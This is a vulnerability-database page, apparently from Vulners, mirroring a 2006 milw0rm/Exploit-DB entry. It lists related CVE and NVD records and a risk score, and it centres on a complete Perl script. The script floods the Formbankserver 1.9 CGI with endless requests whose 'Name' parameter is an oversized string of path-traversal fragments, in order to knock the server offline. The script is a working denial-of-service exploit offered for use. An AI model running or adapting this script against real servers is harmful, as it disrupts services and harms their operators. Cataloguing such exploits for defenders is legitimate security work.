Lucene search
+L

Formbankserver 1.9 - 'Name' Remote Denial of Service

🗓️ 31 Dec 2006 00:00:00Reported by Bl0od3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Formbankserver 1.9 - 'Name' Remote Denial of Service by Bl0od3

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-6910
9 Jan 200711:00
cve
cve
CVE
CVE-2007-0138
9 Jan 200711:00
cve
cvelist
Cvelist
CVE-2006-6910
9 Jan 200711:00
cvelist
cvelist
Cvelist
CVE-2007-0138
9 Jan 200711:00
cvelist
euvd
EUVD
EUVD-2006-6893
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2007-0142
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-6910
31 Dec 200605:00
nvd
nvd
NVD
CVE-2007-0138
9 Jan 200711:28
nvd
prion
Prion
Information disclosure
9 Jan 200711:28
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
3 Jan 200700:00
securityvulns
Rows per page
#!perl
#Vulnerability found by Bl0od3r
#visit http://dc3.dl.am to see more exploits
#http://www.fersch.de/formbankserver/
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
- Hide quoted text -
use IO::Socket;
use warnings;
 package exploit;
 sub new { bless {} }
 sub bar {
         my $self = shift;
$self->{host}=$ARGV[0];
$self->{port}=$ARGV[1];
&start;
}
 my $attack = exploit->new();
 $attack->bar();


sub error() {
print("Connection Refused.Check the host now.It seems like its successfully attacked.");
}

sub start() {
$host=$ARGV[0];
$port=$ARGV[1];
$buff="/../" x 999;
die("No Host.") unless($host);
die("No Port.") unless($port);
for ($i=0;$i<99999;$i++) {
      while () {
$buff.="BABA";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &error();
    syswrite STDOUT,"+";
    print $sock "GET /cgi-bin/formbankcgi.exe/Abfrage?Name=".$buff." HTTP/1.1\n";
        print $sock "Connection: close\n\n";
    syswrite STDOUT,"+";
  }
 }
}

# milw0rm.com [2006-12-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Dec 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.0302
42